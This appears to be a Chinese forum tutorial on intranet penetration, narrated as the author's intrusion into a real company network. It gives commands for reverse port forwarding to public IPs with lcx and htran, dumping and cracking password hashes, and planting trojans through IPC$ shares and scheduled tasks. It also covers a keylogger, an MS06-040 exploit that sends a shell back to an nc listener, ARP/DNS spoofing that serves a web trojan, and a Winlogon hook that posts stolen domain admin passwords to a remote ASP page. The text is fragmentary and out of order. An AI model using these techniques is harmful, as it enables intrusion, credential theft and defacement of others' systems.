┈━═☆精典详细内网渗透专题文章
by: 樱花浪子
|
经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图,图1,图2所示。
如果有的朋友现在还不了解路由器和交换机等什么意思,那应该好好补习一下了。这里在说一下什么叫内网,可能有的朋友认192.168.1.x这样的形式就是内网,前段时间QQ上一朋友挂出一台机器,告诉我有内网,我问他怎么判断的,他说执行ipconfig /all的时候看见内网地址了,其实这样判断太过草率,比如说我为了安全,我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网,其实我有内网吗?是没有的。
直接把下回本地看看是什么东东,原来是一个查找字符的工具,如图4所示。
莫非这站以前让人搞过,管理员用来查找被改文件的,试了一下可以改名,如图5,
那么好办了,我直接捆了一个木马在上面,把这个删掉,等着管理员上线吧,等了两天管理员还是没有上线,这么等下去也不是办法,只好把首页涂了,告诉他网站有漏洞,已被人植入木马,请查找木马之类的,并修改了几个重要文件的时间,果然管理员上线了。如图6。
执行ipconfig /all果然有内网IP,图7。
既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具,都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也可以在本机架FTP服务器,用到20cn的FTP服务器,图8。
设置好用户和密码后cmdshell里执行:
在执行netstat -an发现3389开放,当然这样直接连是连接不上的,因为我们外界是无法直接访问到内部机器的,但可以让内网机器来访问我们,比如现在流行的反弹木马,这样就需要我们做端口映射,说到端口映射工具当然代表作就是LCX写的工具了,首先在本机执行lcx -listen 99 9833,在肉鸡上执行lcx -slave 123.114.120.115 127.0.0.1 99 3389,意思是在本机监听99和9833端口,把99端口数据转到9833上面,然后把肉鸡的3389端口数据转到本机的99端口上,然后就可以拿连接器连接本地的9833端口了,如图10所示。
而奇怪的是这次却没有连上,那就用下教主的高级内网渗透工具Paris,工具其他功能不多说了,只说下端口映射的功能,传msxidc和vVXDc.dll到目标内网机器,在目标机器执行:msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22,在自己机器或者有公网IP的肉鸡:MAPServer.EXE -p22,这时候只要连接本机的或者公网IP肉鸡的22端口就可以了,在说一款比较不错的工具,htran.exe,能开启Socks5服务,但我们只说端口映射,命令:在公网肉鸡监听(临听任意两个端口):htran -p -listen 119 120,在内网的机器执行:htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389,这样是把这个内网肉鸡的3389转发到公网肉鸡或者自己机器的119端口上,然后再用3389登陆器连接公网肉鸡的120端口。或者连接本机的120端口,如图11所示。 
这几款工具各有优势,大家在渗透的时候根据需要自己选择吧。
然后在本机设置sockscap,设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去登录管理。如图13,14所示。
进了3389后我们第一步需要干什么?可能很多朋友都是留后门,像什么上帝之门、SHIFT后门,记录3389帐号等等。当然留什么后门好不在本文讨论之中。我个人比较喜欢抓HASH(哈希),一般是pwdump+lc5,一般我破解的时候数字加字母的10位组合在3个小时左右就可以破得出来,而且现在还有破解HASH的彩虹表,不过体积是很庞大的,在有前段时间在网上看见一篇文章,文章名字是“卸载补丁去除保护 获取Windows 2003密码”,大致意思是卸载Windows2003 SP1/SP2,因为windows 2003 +SP0才可以利用findpass从winlogin进程中抓出系统账号明文密码,抓出密码在重安装上补丁。我个人没有实验过,此方法很暴力,我个人也不推荐这么做,很容易被发现的。 
这样计算机的用户名和HASH值就会出现在列表里,如图16。 
直接点右上方的开始就可以破解密码了,图17所示,
也可以导出用LC5破解,在选择--文件--输出用户到PWDUMP,这样把HASH保存为文件文件,图18。
也可以用PWDUMP抓,如图19,
 而对于2000的系统我们直接可以用MT读出密码,直接运行mt -findpass,如
图22所示
,为什么要破解本机密码,因为在内网渗透的过程中抓出一台管理员的密码是很重要的,现在我们有了内网一台机器了,当然要继续渗透下去,在这里我总结一下几种方法,方法一、扫描弱口令,ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗,DNS欺骗。方法五、域结构下的渗透。这里简单的总结五方面,但是每一方面具体利用起来又包括很细节在里面。  然后用本机的知道的密码去连接。当然如果改成别的端口我们根据情况转换一下,有的时候在外网的机器很坚固,到了内网的时候就很脆弱了。当然现在机器已经很少弱口令了,但是我们有本机管理员帐户和密码,管理员为了方便往往都设置成一样的,因为做系统的时候做完一台直接GHOST别的系统。而ipc$连接可以是说是非常古老和经典的。
IPC 是Internet Process Connection的缩写,也就是远程网络连接。WindowsNT/2000/XP/2003默认都提供了IPC$管道连接,就是在两个计算机进程之间建立通信连接。打个比方,IPC连接就像是挖好的地道,程序可通过地道访问远程主机。默认情况下,IPC是共享的,也就是说微软已经为我们挖好了这个地道(IPC),因此,这种基于IPC的入侵也常常被简称为IPC入侵。 IPC 后面的$是共享的意思,不过是隐藏的共享,微软系统中用“$”表示隐藏的共享,比如C$就是隐藏的共享C盘。也就是说C盘是共享的。ipc$连接这个只能说是管理员开的共享,严格来说不能算一个漏洞,目标主机还需满足两个条件:1、目标主机开启了ipc$共享 ;2、拥有目标主机的管理员帐号和密码 。 当年在2000系统的时候ipc$入侵可以说是风扉一时。 这里我用两台XP做演示,打开命令提示符在CMD下输入:net use //IP/ipc$ "password" /user:"username" 建立非空连接,接着copy /路径/*.exe //IP/共享目录名,向远程主机复制文件,接着net time //IP,查看远程主机的当前时间, 图24所示
,接着就可以用计划任务运行我们COPY过去的程序了,执行at //ip 时间 程序名,远程添加计划任务,图25所示。
可以按照我们规定的时间内运行程序,如果对方禁止了计划任务,默认是开启的,我们可以把文件复制到对方启动目录,先执行net use z: //IP/c$,是把对方C盘映射到本机Z盘上,这样我们直接将木马放在启动目录,如图26所示。
等复制完了想断开了可以用命令,net use z: /del /y,这样可以删除映射的z盘 如果有朋友也手工输入命令麻烦,也可以用20CN的IPC扫描器,可以同步植入木马。如图27所示。
在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。后面会介绍域环境下的渗透。
我们点击开始监控就可以了。这个工具可以记录中文,这点对于有些机器还是不错的,记录的文件可以设置,方法为修改config.ini里的文件. 格式为如 c:/1111.txt,然后再运行keyboardlog.exe,点击停止监控,然后再重新点开始监控。如图29是记录到的内容。
至于记录的什么内容就要靠大家去分析然后配合社会工程学了。
在本机用NC监听1234端口,执行nc -l -v -p 1234,如图31,
然后用另一个CMD窗口执行,ms06040rpc 对方IP 本机IP 1234 1,这样用NC监听的端口会返回了对方的CMDSHELL,如图32、33所示。
在得到CMDSHELL之后,是添加用户或者给机器中木马,就看见大家爱好了。另外也可以用去年比较火的DNS溢出,DNS服务一般开放53端口。DNS服务器在有的时候就是域服务器,关于域环境下参考方法五。方法四、arp欺骗,DNS欺骗。
这里第一列显示的是ip地址,第二列显示的是和ip地址对应的网络接口卡的硬件地址(MAC),第三列是该ip和mac的对应关系类型。可见,arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议,或者说ARP协议是一种将ip地址转化成MAC地址的一种协议。它靠维持在内存中保存的一张表来使ip得以在网络上被目标机器应答。
这时在选择下面的ARP,十字按钮是灰色的,我们点击一下空白处,在选择十字按钮,在弹出的对话框里左边选择网关,右边选择欺骗的IP。最后点开始嗅探,上面第二个按钮。如图38所示。
这样就能嗅到数据了,图39是嗅到的HTTP密码。
另外如果嗅到了3389密码我们在上面打开文档,在里面可以找到密码,如图40所示。
大家在用CAIN嗅探的时候可能遇到过这样的情况,数据一大就当机了,过了很少时间都连不上了,所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。这样会大大的减少当机的可能性。如果看到丢包率超过10%就要注意啦,赶紧停掉,看看那里没设置好吧。另外提供一个“chong”写的BAT程序,在开嗅的时候运行它就可以了。
而我们响应的地址可以是一个网页木马的地址,这里我以网关为例,也就是说192.168.1.101访问www.baidu.com的时候会转向192.168.1.1的页面,我们先来访问一下192.168.1.1,如图42所示,
是不是也和192.168.1.1一样了,如果我们在本架设一个HTTP服务器,挂上一个网马后,就能欺骗访问者了,当然如果想做的更像,可以制作一个和欺骗主页一样的页面。
如何判断有没有域呢,其实一个ipconfig /all基本就看出来了,大家在回到图7当中,注意一下第二项,也就是Primary Dns Suffix这项,从这个命令我们可以得知,存在一个域xxxx-cc.com,我们ping一下域xxxx-cc.com,得到域服务器的ip。如图45所示。
或者用命令net config workstation,会显示本机计算机名和管理员用户名,工作站的域DNS名称及登录到的域,如图46所示。
接着执行net localgroup administrators来看一下本机在域里面的角色,如图47所示。
看来只是一个普通域用户。我们再来查看一下域里面有多少的用户,执行net user /domain,域里面的用户很多,如图48所示。
域里面这么多用户,那么我们再查看一下域管理员有哪些,执行net group "domain admins" /domain,貌似只有一个域管理员。如图49所示。
大家知道在域管理网络中只要搞定了域管理员内网一切机器都OK了,现在域服务器有了,域管理员有了。思路呢?可以用上面的几种方法来入侵域服务器,如ARP嗅探域服务器,而域管理器在很多时候也是DNS服务器,也可以尝试DNS溢出等。这里我为大家推荐一个Winlogon劫持记录3389密码小工具,原作者为“lovemfc”,我们用这个不是记录本机登录的3389密码,当然本机也是可以记录的,更不错的是可以记录域管理员登录本机的密码,因为域管理员是有权限登录下面每台用户的机器的。缺点是记录密码的东西只能保存本机上,而ASM根据这个写了一个发信版的生成器,这就方便我们大家了,程序运行后如图50。
选择好接受的ASP地址后,生成出来CreateServer.exe,直接在服务器上运行即可,post.asp会在你的URL地址下生成key.txt。适用范围2003系统,图51是我记录到本机管理员和域管理员的密码
,这下就可以纵横整个内网了。在服务器上扫描开放3389端口的,用域管理员登录全部OK,在域控的环境中,我们只要得到域控密码也可以直接用ipc连接管理员机器种马。最后登录内网几台机器抓图纪念一下,如图52。  最后说一下本文章只做菜鸟渗透入门文章,当然内网渗透还有其他深入的技巧,如主动会话劫持等,因本人时间和水平都有限,文章中不足之处欢迎大家批评指正。菜菜朋友们在文章中如有问题联系我可以去非安全官方网站。
|
最后我们把内容复制下来保存文本文件用LC5破解,LC5的安装非常的简单,一直下一步即可。程序自己带注册机,我们在注册一下,完事后我们在程序主页面导入刚才保存的hash.txt,点击导入按钮(第六个),在选择从PWDUMP文件,用户列表就会显示出来了,在点击开始就可以破解了,如图20,21所示。
直接NEXT下一步就可以了,安装好我们运行CAIN,点击Sniffer,在选择工具栏第二个按钮,在点击十字架,在弹出对话框中我们选择子网中所有计算机,如图36所示。
我们在192.168.1.104的机器上装CAIN开始DSN欺骗后访问百度网页,如图43所示。
扫一扫
6394
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
